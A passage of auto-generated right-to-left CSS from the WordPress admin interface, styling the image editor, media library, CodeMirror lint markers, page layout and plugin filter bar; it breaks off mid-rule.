.wp_attachment_image .button, .A1B1 .button { float: right; } .no-js .wp_attachment_image .button { display: none; } .wp_attachment_image .spinner, .A1B1 .spinner { float: right; } .imgedit-menu .note-no-rotate { clear: both; margin: 0; padding: 1em 0 0; } .imgedit-menu .button:after, .imgedit-menu .button:before { font: normal 16px/1 dashicons; margin-left: 8px; vertical-align: middle; position: relative; top: -2px; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } .imgedit-menu .imgedit-rotate.button:after { content: '\f140'; margin-right: 2px; margin-left: 0; } .imgedit-menu .imgedit-rotate.button[aria-expanded="true"]:after { content: '\f142'; } .imgedit-menu .button.disabled { color: #a7aaad; border-color: #dcdcde; background: #f6f7f7; box-shadow: none; text-shadow: 0 1px 0 #fff; cursor: default; transform: none; } .imgedit-crop:before { content: "\f165"; content: "\f165" / ''; } .imgedit-scale:before { content: "\f211"; content: "\f211" / ''; } .imgedit-rotate:before { content: "\f167"; content: "\f167" / ''; } .imgedit-undo:before { content: "\f171"; content: "\f171" / ''; } .imgedit-redo:before { content: "\f172"; content: "\f172" / ''; } .imgedit-crop-wrap { position: relative; } .imgedit-crop-wrap img { background-image: linear-gradient(-45deg, #c3c4c7 25%, transparent 25%, transparent 75%, #c3c4c7 75%, #c3c4c7), linear-gradient(-45deg, #c3c4c7 25%, transparent 25%, transparent 75%, #c3c4c7 75%, #c3c4c7); background-position: 100% 0, 10px 10px; background-size: 20px 20px; } .imgedit-crop-wrap { padding: 20px; background-image: linear-gradient(-45deg, #c3c4c7 25%, transparent 25%, transparent 75%, #c3c4c7 75%, #c3c4c7), linear-gradient(-45deg, #c3c4c7 25%, transparent 25%, transparent 75%, #c3c4c7 75%, #c3c4c7); background-position: 100% 0, 10px 10px; background-size: 20px 20px; } .imgedit-crop { margin: 0 0 0 8px; } .imgedit-rotate { margin: 0 3px 0 8px; } .imgedit-undo { margin: 0 3px; } .imgedit-redo { margin: 0 3px 0 8px; } .imgedit-thumbnail-preview-group { display: flex; flex-wrap: wrap; column-gap: 10px; } .imgedit-thumbnail-preview { margin: 10px 0 0 8px; } .imgedit-thumbnail-preview-caption { display: block; } #poststuff .imgedit-group-top h2 { display: inline-block; margin: 0; padding: 0; font-size: 14px; line-height: 1.4; } #poststuff .imgedit-group-top .button-link { text-decoration: none; color: #1d2327; } .imgedit-applyto .imgedit-label { display: block; padding: .5em 0 0; } .imgedit-popup-menu, .imgedit-help { display: none; padding-bottom: 8px; } .imgedit-panel-tools > .imgedit-menu { display: flex; column-gap: 4px; align-items: flex-start; flex-wrap: wrap; } .imgedit-popup-menu { width: calc( 100% - 20px ); position: absolute; background: #fff; padding: 10px; box-shadow: 0 3px 6px rgba(0, 0, 0, 0.3); } .image-editor .imgedit-menu .imgedit-popup-menu button { display: block; margin: 2px 0; width: 100%; white-space: break-spaces; line-height: 1.5; padding-top: 3px; padding-bottom: 2px; } .imgedit-rotate-menu-container { position: relative; } .imgedit-help.imgedit-restore { padding-bottom: 0; } /* higher specificity than buttons */ .image-editor .imgedit-settings .imgedit-help-toggle, .image-editor .imgedit-settings .imgedit-help-toggle:hover, .image-editor .imgedit-settings .imgedit-help-toggle:active { border: 1px solid transparent; margin: -1px -1px 0 0; padding: 0; background: transparent; color: var(--wp-admin-theme-color); font-size: 20px; line-height: 1; cursor: pointer; box-sizing: content-box; box-shadow: none; } .image-editor .imgedit-settings .imgedit-help-toggle:focus { color: var(--wp-admin-theme-color); border-color: var(--wp-admin-theme-color); box-shadow: 0 0 0 1px var(--wp-admin-theme-color); /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } .form-table td.imgedit-response { padding: 0; } .imgedit-submit-btn { margin-right: 20px; } .imgedit-wrap .nowrap { white-space: nowrap; font-size: 12px; line-height: inherit; } span.imgedit-scale-warn { display: flex; align-items: center; margin: 4px; gap: 4px; color: #b32d2e; font-style: normal; visibility: hidden; vertical-align: middle; } .imgedit-save-target { margin: 8px 0; } .imgedit-save-target legend { font-weight: 600; } .imgedit-group { margin-bottom: 20px; } .image-editor .imgedit-original-dimensions { display: inline-block; } .image-editor .imgedit-scale-controls input[type="text"], .image-editor .imgedit-crop-ratio input[type="text"], .image-editor .imgedit-crop-sel input[type="text"], .image-editor .imgedit-scale-controls input[type="number"], .image-editor .imgedit-crop-ratio input[type="number"], .image-editor .imgedit-crop-sel input[type="number"] { width: 80px; font-size: 14px; padding: 0 8px; } .imgedit-separator { display: inline-block; width: 7px; text-align: center; font-size: 13px; color: #3c434a; } .image-editor .imgedit-scale-button-wrapper { margin-top: 0.3077em; display: block; } .image-editor .imgedit-scale-controls .button { margin-bottom: 0; } audio, video { display: inline-block; max-width: 100%; } .wp-core-ui .mejs-container { width: 100%; max-width: 100%; } .wp-core-ui .mejs-container * { box-sizing: border-box; } .wp-core-ui .mejs-time { box-sizing: content-box; } /* =Media Queries -------------------------------------------------------------- */ /** * HiDPI Displays */ @media print, (min-resolution: 120dpi) { .imgedit-wait:before { background-image: url(../images/spinner-2x.gif); } } @media screen and (max-width: 782px) { .edit-attachment-frame input, .edit-attachment-frame textarea { line-height: 1.5; } .wp_attachment_details label[for="content"] { font-size: 14px; line-height: 1.5; } .wp_attachment_details textarea { line-height: 1.5; } .wp_attachment_details #attachment_alt { height: 3.375em; } .media-upload-form .media-item.error, .media-upload-form .media-item .error { font-size: 13px; line-height: 1.5; } .media-upload-form .media-item.error { padding: 1px 10px; } .media-upload-form .media-item .error { padding: 10px 12px 10px 0; } .image-editor .imgedit-scale input[type="text"], .image-editor .imgedit-crop-ratio input[type="text"], .image-editor .imgedit-crop-sel input[type="text"] { font-size: 16px; padding: 6px 10px; } .wp_attachment_holder .imgedit-wrap .imgedit-panel-content, .wp_attachment_holder .imgedit-wrap .image-editor { float: none; width: auto; max-width: none; padding-bottom: 16px; } .copy-to-clipboard-container .success { font-size: 14px; } /* Restructure image editor on narrow viewports. */ .imgedit-crop-wrap img{ width: 100%; } .media-modal .imgedit-wrap .imgedit-panel-content, .media-modal .imgedit-wrap .image-editor { position: initial !important; } .media-modal .imgedit-wrap .image-editor { box-sizing: border-box; width: 100% !important; } .image-editor .imgedit-scale-button-wrapper { display: inline-block; } } @media only screen and (max-width: 600px) { .media-item-wrapper { grid-template-columns: 1fr; } } /** * Media queries for media grid. */ @media only screen and (max-width: 1120px) { /* override for media-views.css */ #wp-media-grid .wp-filter .attachment-filters { max-width: 100%; } } @media only screen and (max-width: 1000px) { /* override for forms.css */ .wp-filter p.search-box { float: none; width: 100%; display: flex; flex-wrap: nowrap; column-gap: 0; } .wp-filter p.search-box #media-search-input { width: 100%; } } @media only screen and (max-width: 782px) { .media-frame.mode-select .attachments-browser.fixed .media-toolbar { top: 46px; left: 10px; } .media-frame.mode-grid .media-toolbar select { min-height: 40px; padding: 0 12px 0 24px; } .media-frame.mode-grid .media-toolbar input[type="search"] { min-height: 40px; padding: 0 12px; } .wp-filter p.search-box { margin-bottom: 0; } } @media only screen and (max-width: 600px) { .media-frame.mode-select .attachments-browser.fixed .media-toolbar { top: 0; } } @media only screen and (max-width: 480px) { .edit-attachment-frame .media-frame-title { left: 110px; } .upload-php .media-modal-close, .edit-attachment-frame .edit-media-header .left, .edit-attachment-frame .edit-media-header .right { width: 40px; height: 40px; } .edit-attachment-frame .edit-media-header .right:before, .edit-attachment-frame .edit-media-header .left:before { line-height: 40px !important; } .edit-attachment-frame .edit-media-header .left { left: 82px; } .edit-attachment-frame .edit-media-header .right { left: 41px; } .edit-attachment-frame .media-frame-content { top: 40px; } .edit-attachment-frame .attachment-media-view { float: none; height: auto; width: 100%; } .edit-attachment-frame .attachment-info { height: auto; width: 100%; } } @media only screen and (max-width: 640px), screen and (max-height: 400px) { .upload-php .mode-grid .media-sidebar{ max-width: 100%; } } @media only screen and (max-width: 375px) { .media-item .attachment-tools { align-items: baseline; } .media-item .edit-attachment.copy-to-clipboard-container { flex-direction: column; } .copy-to-clipboard-container .success { line-height: normal; margin-top: 10px; } } /*! This file is auto-generated */ .wrap [class*="CodeMirror-lint-marker"], .wp-core-ui [class*="CodeMirror-lint-message"], .wrap .CodeMirror-lint-marker-multiple { background-image: none; } .wp-core-ui .CodeMirror-lint-marker-error, .wp-core-ui .CodeMirror-lint-marker-warning { cursor: help; } .wrap .CodeMirror-lint-marker-multiple { position: absolute; top: 0; } .wrap [class*="CodeMirror-lint-marker"]:before { font: normal 18px/1 dashicons; position: relative; top: -2px; } .wp-core-ui [class*="CodeMirror-lint-message"]:before { font: normal 16px/1 dashicons; right: 16px; position: absolute; } .wp-core-ui .CodeMirror-lint-message-error, .wp-core-ui .CodeMirror-lint-message-warning { box-shadow: 0 1px 1px 0 rgba(0, 0, 0, 0.1); margin: 5px 0 2px; padding: 3px 28px 3px 12px; } .wp-core-ui .CodeMirror-lint-message-warning { background-color: #fcf9e8; border-right: 4px solid #dba617; } .wrap .CodeMirror-lint-marker-warning:before, .wp-core-ui .CodeMirror-lint-message-warning:before { content: "\f534"; color: #dba617; } .wp-core-ui .CodeMirror-lint-message-error { background-color: #fcf0f1; border-right: 4px solid #d63638; } .wrap .CodeMirror-lint-marker-error:before, .wp-core-ui .CodeMirror-lint-message-error:before { content: "\f153"; color: #d63638; } .wp-core-ui .CodeMirror-lint-tooltip { background: none; border: none; border-radius: 0; direction: rtl; } .wrap .CodeMirror .CodeMirror-matchingbracket { background: rgba(219, 166, 23, 0.3); color: inherit; } .CodeMirror { text-align: right; } .wrap .CodeMirror .CodeMirror-linenumber { color: #646970; } /*! This file is auto-generated */ /* 2 column liquid layout */ #wpwrap { height: auto; min-height: 100%; width: 100%; position: relative; -webkit-font-smoothing: subpixel-antialiased; } #wpcontent { height: 100%; padding-right: 20px; } #wpcontent, #wpfooter { margin-right: 160px; } .folded #wpcontent, .folded #wpfooter { margin-right: 36px; } #wpbody-content { padding-bottom: 65px; float: right; width: 100%; overflow: visible; } /* inner 2 column liquid layout */ .inner-sidebar { float: left; clear: left; display: none; width: 281px; position: relative; } .columns-2 .inner-sidebar { margin-left: auto; width: 286px; display: block; } .inner-sidebar #side-sortables, .columns-2 .inner-sidebar #side-sortables { min-height: 300px; width: 280px; padding: 0; } .has-right-sidebar .inner-sidebar { display: block; } .has-right-sidebar #post-body { float: right; clear: right; width: 100%; margin-left: -2000px; } .has-right-sidebar #post-body-content { margin-left: 300px; float: none; width: auto; } /* 2 columns main area */ #col-left { float: right; width: 35%; } #col-right { float: left; width: 65%; } #col-left .col-wrap { padding: 0 0 0 6px; } #col-right .col-wrap { padding: 0 6px 0 0; } /* utility classes */ .alignleft { float: right; } .alignright { float: left; } .textleft { text-align: right; } .textright { text-align: left; } .clear { clear: both; } /* modern clearfix */ .wp-clearfix:after { content: ""; display: table; clear: both; } /* Hide visually but not from screen readers */ .screen-reader-text, .screen-reader-text span, .ui-helper-hidden-accessible { border: 0; clip-path: inset(50%); height: 1px; margin: -1px; overflow: hidden; padding: 0; position: absolute; width: 1px; /* Many screen reader and browser combinations announce broken words as they would appear visually. */ word-wrap: normal !important; word-break: normal !important; } .button .screen-reader-text { height: auto; /* Fixes a Safari+VoiceOver bug, see ticket #42006 */ } .screen-reader-text + .dashicons-external { margin-top: -1px; margin-right: 2px; text-decoration: none; } .screen-reader-shortcut { position: absolute; top: -1000em; right: 6px; height: auto; width: auto; display: block; font-size: 14px; font-weight: 600; padding: 15px 23px 14px; /* Background and color set to prevent false positives in automated accessibility tests. */ background: #ffffff; color: var(--wp-admin-theme-color, #3858e9); z-index: 100000; line-height: normal; } .screen-reader-shortcut:focus { top: -25px; /* Overrides a:focus in the admin. See ticket #56789. */ color: var(--wp-admin-theme-color, #3858e9); box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color, #3858e9); text-decoration: none; /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; outline-offset: -2px; } .hidden, .js .closed .inside, .js .hide-if-js, .no-js .hide-if-no-js, .js.wp-core-ui .hide-if-js, .js .wp-core-ui .hide-if-js, .no-js.wp-core-ui .hide-if-no-js, .no-js .wp-core-ui .hide-if-no-js { display: none; } /* @todo: Take a second look. Large chunks of shared color, from the colors.css merge */ .widget-top, .menu-item-handle, .widget-inside, #menu-settings-column .accordion-container, #menu-management .menu-edit, .manage-menus, table.widefat, .stuffbox, p.popular-tags, .widgets-holder-wrap, .wp-editor-container, .popular-tags, .feature-filter, .comment-ays { border: 1px solid #c3c4c7; box-shadow: 0 1px 1px rgba(0, 0, 0, 0.04); } table.widefat, .wp-editor-container, .stuffbox, p.popular-tags, .widgets-holder-wrap, .popular-tags, .feature-filter, .comment-ays { background: #fff; } /* general */ html, body { height: 100%; margin: 0; padding: 0; } body { background: #f0f0f1; color: #3c434a; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif; font-size: 13px; line-height: 1.4em; min-width: 600px; } body.iframe { min-width: 0; padding-top: 1px; } body.modal-open { overflow: hidden; } body.mobile.modal-open #wpwrap { overflow: hidden; position: fixed; height: 100%; } iframe, img { border: 0; } td { font-family: inherit; font-size: inherit; font-weight: inherit; line-height: inherit; } /* Any change to the default link style must be applied to button-link too. */ a { color: #2271b1; transition-property: border, background, color; transition-duration: .05s; transition-timing-function: ease-in-out; } a, div { outline: 0; } a:hover, a:active { color: #135e96; } a:focus, a:focus .media-icon img, a:focus .plugin-icon, .wp-person a:focus .gravatar { color: #043959; border-radius: 2px; box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color, #3858e9); /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } #adminmenu a:focus { box-shadow: none; /* Only visible in Windows High Contrast mode */ outline: 1px solid transparent; outline-offset: -1px; } .screen-reader-text:focus { box-shadow: none; outline: none; } blockquote, q { quotes: none; } blockquote:before, blockquote:after, q:before, q:after { content: ""; content: none; } p, .wp-die-message { font-size: 13px; line-height: 1.5; margin: 1em 0; } blockquote { margin: 1em; } li, dd { margin-bottom: 6px; } h1, h2, h3, h4, h5, h6 { display: block; font-weight: 600; } h1 { color: #1d2327; font-size: 2em; margin: .67em 0; } h2, h3 { color: #1d2327; font-size: 1.3em; margin: 1em 0; } .update-core-php h2 { margin-top: 4em; } .update-php h2, .update-messages h2, h4 { font-size: 1em; margin: 1.33em 0; } h5 { font-size: 0.83em; margin: 1.67em 0; } h6 { font-size: 0.67em; margin: 2.33em 0; } ul, ol { padding: 0; } ul { list-style: none; } ol { list-style-type: decimal; margin-right: 2em; } ul.ul-disc { list-style: disc outside; } ul.ul-square { list-style: square outside; } ol.ol-decimal { list-style: decimal outside; } ul.ul-disc, ul.ul-square, ol.ol-decimal { margin-right: 1.8em; } ul.ul-disc > li, ul.ul-square > li, ol.ol-decimal > li { margin: 0 0 0.5em; } /* rtl:ignore */ .ltr { direction: ltr; } /* rtl:ignore */ .code, code { font-family: Consolas, Monaco, monospace; direction: ltr; unicode-bidi: embed; } kbd, code { padding: 3px 5px 2px; margin: 0 1px; background: #f0f0f1; background: rgba(0, 0, 0, 0.07); font-size: 13px; } .subsubsub { list-style: none; margin: 8px 0 0; padding: 0; font-size: 13px; float: right; color: #646970; } .subsubsub a { line-height: 2; padding: .2em; text-decoration: none; } .subsubsub a .count, .subsubsub a.current .count { color: #50575e; /* #f1f1f1 background */ font-weight: 400; } .subsubsub a.current { font-weight: 600; border: none; } .subsubsub li { display: inline-block; margin: 0; padding: 0; white-space: nowrap; } /* .widefat - main style for tables */ .widefat { border-spacing: 0; width: 100%; clear: both; margin: 0; } .widefat * { word-wrap: break-word; } .widefat a, .widefat button.button-link { text-decoration: none; } .widefat td, .widefat th { padding: 8px 10px; } .widefat thead th, .widefat thead td { border-bottom: 1px solid #c3c4c7; } .widefat tfoot th, .widefat tfoot td { border-top: 1px solid #c3c4c7; border-bottom: none; } .widefat .no-items td { border-bottom-width: 0; } .widefat td { vertical-align: top; } .widefat td, .widefat td p, .widefat td ol, .widefat td ul { font-size: 13px; line-height: 1.5em; } .widefat th, .widefat thead td, .widefat tfoot td { text-align: right; line-height: 1.3em; font-size: 14px; } .widefat th input, .updates-table td input, .widefat thead td input, .widefat tfoot td input { margin: 0 8px 0 0; padding: 0; vertical-align: text-top; } .widefat .check-column { width: 2.2em; padding: 6px 0 25px; vertical-align: top; } .widefat tbody th.check-column { padding: 9px 0 22px; } .widefat thead td.check-column, .widefat tbody th.check-column, .updates-table tbody td.check-column, .widefat tfoot td.check-column { padding: 11px 3px 0 0; } .widefat thead td.check-column, .widefat tfoot td.check-column { padding-top: 4px; vertical-align: middle; } .update-php div.updated, .update-php div.error { margin-right: 0; } .js-update-details-toggle .dashicons { text-decoration: none; } .js-update-details-toggle[aria-expanded="true"] .dashicons::before { content: "\f142"; content: "\f142" / ''; } .no-js .widefat thead .check-column input, .no-js .widefat tfoot .check-column input { display: none; } .widefat .num, .column-comments, .column-links, .column-posts { text-align: center; } .widefat th#comments { vertical-align: middle; } .wrap { margin: 10px 2px 0 20px; } .wrap > h2:first-child, /* Back-compat for pre-4.4 */ .wrap [class$="icon32"] + h2, /* Back-compat for pre-4.4 */ .postbox .inside h2, /* Back-compat for pre-4.4 */ .wrap h1 { font-size: 23px; font-weight: 400; margin: 0; padding: 9px 0 4px; line-height: 1.3; } .wrap h1.wp-heading-inline { display: inline-block; margin-left: 5px; } .wp-header-end { visibility: hidden; margin: -2px 0 0; } .subtitle { margin: 0; padding-right: 25px; color: #50575e; font-size: 14px; font-weight: 400; line-height: 1; } .subtitle strong { word-break: break-all; } .wrap .add-new-h2, /* deprecated */ .wrap .add-new-h2:active, /* deprecated */ .wrap .page-title-action, .wrap .page-title-action:active { display: inline-block; position: relative; box-sizing: border-box; cursor: pointer; white-space: nowrap; text-decoration: none; text-shadow: none; top: -3px; margin-right: 4px; border: 1px solid #2271b1; border-radius: 2px; background: transparent; font-size: 13px; font-weight: 500; min-height: 32px; line-height: 2.30769231; /* 30px for 32px height */ color: #2271b1; /* use the standard color used for buttons */ padding: 0 12px; -webkit-appearance: none; } .wrap .wp-heading-inline + .page-title-action { margin-right: 0; } .wrap .add-new-h2:hover, /* deprecated */ .wrap .page-title-action:hover { border-color: #0a4b78; color: #0a4b78; } /* lower specificity: color needs to be overridden by :hover and :active */ .page-title-action:focus { color: #0a4b78; } /* Dashicon for language options on General Settings and Profile screens */ .form-table th label[for="locale"] .dashicons, .form-table th label[for="WPLANG"] .dashicons { margin-right: 5px; } .wrap .page-title-action:focus { border-color: #3582c4; box-shadow: 0 0 0 1px #3582c4; /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } .wrap h1.long-header { padding-left: 0; } .wp-dialog { background-color: #fff; } .widgets-chooser ul, #widgets-left .widget-in-question .widget-top, #available-widgets .widget-top:hover, div#widgets-right .widget-top:hover, #widgets-left .widget-top:hover { border-color: #8c8f94; box-shadow: 0 1px 2px rgba(0, 0, 0, 0.1); } .sorthelper { background-color: #c5d9ed; } .ac_match, .subsubsub a.current { color: #000; } .striped > tbody > :nth-child(odd), ul.striped > :nth-child(odd), .alternate { background-color: #f6f7f7; } .bar { background-color: #f0f0f1; border-left-color: var(--wp-admin-theme-color); } /* Helper classes for plugins to leverage the active WordPress color scheme */ .highlight { background-color: rgba(var(--wp-admin-theme-color--rgb), 0.08); color: #3c434a; } .wp-ui-primary { color: #fff; background-color: #2c3338; } .wp-ui-text-primary { color: #2c3338; } .wp-ui-highlight { color: #fff; background-color: #2271b1; } .wp-ui-text-highlight { color: #2271b1; } .wp-ui-notification { color: #fff; background-color: #d63638; } .wp-ui-text-notification { color: #d63638; } .wp-ui-text-icon { color: #8c8f94; /* same as new icons */ } /* For emoji replacement images */ img.emoji { display: inline !important; border: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; box-shadow: none !important; } /*------------------------------------------------------------------------------ 1.0 - Text Styles ------------------------------------------------------------------------------*/ .widget .widget-top, .postbox .hndle, .stuffbox .hndle, .control-section .accordion-section-title, .sidebar-name, #nav-menu-header, #nav-menu-footer, .menu-item-handle, .checkbox, .side-info, #your-profile #rich_editing, .widefat thead th, .widefat thead td, .widefat tfoot th, .widefat tfoot td { line-height: 1.4em; } .widget .widget-top, .menu-item-handle { background: #f6f7f7; color: #1d2327; } .stuffbox .hndle { border-bottom: 1px solid #c3c4c7; } .quicktags { background-color: #c3c4c7; color: #000; font-size: 12px; } .icon32 { display: none; } /* @todo can we combine these into a class or use an existing dashicon one? */ .welcome-panel .welcome-panel-close:before, .tagchecklist .ntdelbutton .remove-tag-icon:before, #bulk-titles .ntdelbutton:before, .notice-dismiss:before { background: none; color: #1e1e1e; content: "\f335"; content: "\f335" / ''; display: block; font: normal 20px/1 dashicons; height: 1em; text-align: center; width: 1em; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } .welcome-panel .welcome-panel-close:before { margin: 0; } .tagchecklist .ntdelbutton .remove-tag-icon:before { margin-right: 2px; border-radius: 50%; color: var(--wp-admin-theme-color, #3858e9); /* vertically center the icon cross browsers */ line-height: 1.1; } .tagchecklist .ntdelbutton:focus { outline: 0; } .tagchecklist .ntdelbutton:hover .remove-tag-icon:before, .tagchecklist .ntdelbutton:focus .remove-tag-icon:before, #bulk-titles .ntdelbutton:hover:before, #bulk-titles .ntdelbutton:focus:before { color: #d63638; } .tagchecklist .ntdelbutton:focus .remove-tag-icon:before { box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color, #3858e9); /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } .key-labels label { line-height: 24px; } strong, b { font-weight: 600; } .pre { /* https://developer.mozilla.org/en-US/docs/CSS/white-space */ white-space: pre-wrap; /* css-3 */ word-wrap: break-word; /* IE 5.5 - 7 */ } .howto { color: #646970; display: block; } p.install-help { margin: 8px 0; font-style: italic; } .no-break { white-space: nowrap; } hr { border: 0; border-top: 1px solid #dcdcde; border-bottom: 1px solid #f6f7f7; } .row-actions span.delete a, .row-actions span.trash a, .row-actions span.spam a, .plugins a.delete, #all-plugins-table .plugins a.delete, #search-plugins-table .plugins a.delete, .submitbox .submitdelete, #media-items a.delete, #media-items a.delete-permanently, #nav-menu-footer .menu-delete, #delete-link a.delete, a#remove-post-thumbnail, .privacy_requests .remove-personal-data .remove-personal-data-handle { color: #b32d2e; } abbr.required, span.required, .file-error, .row-actions .delete a:hover, .row-actions .trash a:hover, .row-actions .spam a:hover, .plugins a.delete:hover, #all-plugins-table .plugins a.delete:hover, #search-plugins-table .plugins a.delete:hover, .submitbox .submitdelete:hover, #media-items a.delete:hover, #media-items a.delete-permanently:hover, #nav-menu-footer .menu-delete:hover, #delete-link a.delete:hover, a#remove-post-thumbnail:hover, .privacy_requests .remove-personal-data .remove-personal-data-handle:hover { color: #b32d2e; border: none; } .application-password-display .success { color: #007017; margin-right: 0.5rem; } /*------------------------------------------------------------------------------ 3.0 - Actions ------------------------------------------------------------------------------*/ #major-publishing-actions { padding: 10px; clear: both; border-top: 1px solid #dcdcde; background: #f6f7f7; display: flex; flex-wrap: wrap; align-items: center; justify-content: space-between; } #delete-action { line-height: 2.30769231; /* 30px */ } #delete-link a { text-decoration: none; } #publishing-action { text-align: left; margin-right: auto; line-height: 1.9; } #publishing-action .spinner { float: none; } #misc-publishing-actions { padding: 6px 0 0; } .misc-pub-section { padding: 6px 10px 8px; } .word-wrap-break-word, .misc-pub-filename { word-wrap: break-word; } #minor-publishing-actions { padding: 10px 10px 0; text-align: left; } #save-post { float: right; } .preview { float: left; } #sticky-span { margin-right: 18px; } .approve, .unapproved .unapprove { display: none; } .unapproved .approve, .spam .approve, .trash .approve { display: inline; } td.action-links, th.action-links { text-align: left; } #misc-publishing-actions .notice { margin-right: 10px; margin-left: 10px; } /* Filter bar */ .wp-filter { display: inline-block; position: relative; box-sizing: border-box; margin: 12px 0 25px; padding: 0 10px; width: 100%; box-shadow: 0 1px 1px rgba(0, 0, 0, 0.04); border: 1px solid #c3c4c7; background: #fff; color: #50575e; font-size: 13px; } .wp-filter a { text-decoration: none; } .filter-count { display: inline-block; vertical-align: middle; min-width: 4em; } .title-count, .filter-count .count { display: inline-block; position: relative; top: -1px; padding: 4px 10px; border-radius: 30px; background: #646970; color: #fff; font-size: 14px; font-weight: 600; } /* not a part of filter bar, but derived from it, so here for now */ .title-count { display: inline; top: -3px; margin-right: 5px; margin-left: 20px; } .filter-items { float: right; } .filter-links { display: inline-block; margin: 0; } .filter-links li { display: inline-block; margin: 0; } .filter-links li > a { display: inline-block; margin: 0 10px; padding: 15px 0; border-bottom: 4px solid #fff; color: #646970; cursor: pointer; } .filter-links .current { box-shadow: none; border-bottom: 4px solid var(--wp-admin-theme-color); color: #1d2327; } .filter-links li > a:hover, .filter-links li > a:focus, .show-filters .filter-links a.current:hover, .show-filters .filter-links a.current:focus { color: var(--wp-admin-theme-color); } .wp-filter .search-form { float: left; display: flex; align-items: center; column-gap: .5rem; } .wp-filter .search-form input[type="search"] { width: 280px; max-width: 100%; } .wp-filter .search-form select { margin: 0; } .wp-filter .search-form input[type="search"] { min-height: 32px; padding: 0 8px; } .wp-filter .search-form select, .wp-filter .filter-items select { min-height: 32px; line-height: 2.14285714; /* 30px for 32px height with 14px font */ padding: 0 8px 0 24px; } .wp-filter .button { min-height: 32px; line-height: 2.30769231; /* 30px for 32px height with 13px font */ padding: 0 12px; } /* Use flexbox only on the plugins install page and upload page. The `filter-links` and search form children will become flex items. */ .plugin-install-php .wp-filter, .upload-php .wp-filter { display: flex; flex-wrap: wrap; justify-content: space-between; align-items: center; } .wp-filter .search-form.search-plugins select, .wp-filter .search-form.search-plugins .wp-filter-search, .no-js .wp-filter .search-form.search-plugins .button { display: inline-block; vertical-align: top; } .wp-filter .button.drawer-toggle { margin: 10px 9px 0; padding: 0 6px 0 10px; border-color: transparent; background-color: transparent; color: #646970; vertical-align: baseline; box-shadow: none; } .wp-filter .drawer-toggle:before { content: "\f111"; content: "\f111" / ''; margin: 0 0 0 5px; color: #646970; font: normal 16px/1 dashicons; vertical-align: text-bottom; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } .wp-filter .button.drawer-toggle:hover, .wp-filter .drawer-toggle:hover:before, .wp-filter .button.drawer-toggle:focus, .wp-filter .drawer-toggle:focus:before { background-color: transparent; color: var(--wp-admin-theme-color); } .wp-filter .button.drawer-toggle:hover, .wp-filter .button.drawer-toggle:focus:active { border-color: transparent; } .wp-filter .button.drawer-toggle:focus { border-color: var(--wp-admin-theme-color); } .wp-filter .button.drawer-toggle:active { background: transparent; box-shadow: none; transform: none; } .wp-filter .drawer-toggle.current:before { color: #fff; } .filter-drawer, .wp-filter .favorites-form { display: none; margin: 0 -20px 0 -10px; padding: 20px; border-top: 1px solid #f0f0f1; background: #f6f7f7; overflow: hidden; } .wp-filter .favorites-form .favorites-username { display: flex; align-items: center; flex-wrap: wrap; gap: 0.5rem; } .wp-filter .favorites-form .favorites-username input { margin: 0; } .show-filters .filter-drawer, .show-favorites-form .favorites-form { display: block; } .show-filters .filter-links a.current { border-bottom: none; } .show-filters .wp-filter .button.drawer-toggle { border-radius: 2px; background: #646970; color: #fff; } .show-filters .wp-filter .drawer-toggle:hover, .show-filters .wp-filter .drawer-toggle:focus { background: var(--wp-admin-theme-color); } .show-filters .wp-filter .drawer-toggle:before { color: #fff; } .filter-group { box-sizing: border-box; position: relative; float: right; margin: 0 0 0 1%; padding: 20px 10px 10px; width: 24%; background: #fff; border: 1px solid #dcdcde; box-shadow: 0 1px 1px rgba(0, 0, 0, 0.04); } .filter-group legend { position: absolute; top: 10px; display: block; margin: 0; padding: 0; font-size: 1em; font-weight: 600; } .filter-drawer .filter-group-feature { margin: 28px 0 0; list-style-type: none; font-size: 12px; } .filter-drawer .filter-group-feature input, .filter-drawer .filter-group-feature label { line-height: 1.4; } .filter-drawer .filter-group-feature input { position: absolute; margin: 0; } .filter-group .filter-group-feature label { display: block; margin: 14px 23px 14px 0; } .filter-drawer .buttons { clear: both; margin-bottom: 20px; } .filter-drawer .filter-group + .buttons { margin-bottom: 0; padding-top: 20px; } .filter-drawer .buttons .button span { display: inline-block; opacity: 0.8; font-size: 12px; text-indent: 10px; } .wp-filter .button.clear-filters { display: none; margin-right: 10px; } .wp-filter .button-link.edit-filters { padding: 0 5px; line-height: 2.2; } .filtered-by { display: none; margin: 0; } .filtered-by > span { font-weight: 600; } .filtered-by a { margin-right: 10px; } .filtered-by .tags { display: flex; align-items: flex-start; flex-wrap: wrap; gap: 8px; } .filtered-by .tag { padding: 4px 8px; border: 1px solid #dcdcde; box-shadow: 0 1px 1px rgba(0, 0, 0, 0.04); background: #fff; font-size: 11px; } .filters-applied .filter-group, .filters-applied .filter-drawer .buttons, .filters-applied .filter-drawer br { display: none; } .filters-applied .filtered-by { display: flex; align-items: center; flex-wrap: wrap; gap: 10px; } .filters-applied .filter-drawer { padding: 20px; } .show-filters .favorites-form, .show-filters .content-filterable, .show-filters.filters-applied.loading-content .content-filterable, .loading-content .content-filterable, .error .content-filterable { display: none; } .show-filters.filters-applied .content-filterable { display: block; } .loading-content .spinner { display: block; margin: 40px auto 0; float: none; } @media only screen and (max-width: 1138px) { .wp-filter .search-form { margin: 11px 0; } } @media only screen and (max-width: 1250px) { .wp-filter:has(.plugin-install-search) .search-form { margin: 11px 0; } } @media only screen and (max-width: 1120px) { .filter-drawer { border-bottom: 1px solid #f0f0f1; } .filter-group { margin-bottom: 0; margin-top: 5px; width: 100%; } .filter-group li { margin: 10px 0; } } @media only screen and (max-width: 1000px) { .filter-items { float: none; } .wp-filter 